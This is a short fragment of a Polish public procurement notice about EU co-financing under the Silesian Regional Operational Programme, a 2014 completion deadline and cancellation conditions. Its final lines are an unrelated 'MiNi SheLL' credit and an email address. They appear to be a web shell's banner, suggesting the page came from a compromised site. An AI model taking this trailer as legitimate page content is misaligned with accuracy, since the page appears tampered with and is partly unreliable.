<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane jest ze środków Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 Priorytet I. Badania i rozwój technologiczny (B+R), innowacje i przedsiębiorczość Poddziałanie 1.1.1 Infrastruktura rozwoju gospodarczego. Wymagany termin realizacji zamówienia: od dnia podpisania umowy do czasu zakończenia inwestycji (robót budowlanych) tj. do dnia 31.10.2014 r. Ogłoszenie o zamówieniu zostało zamieszczone w Biuletynie Zamówień Publicznych w dniu 12.07.2013r.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com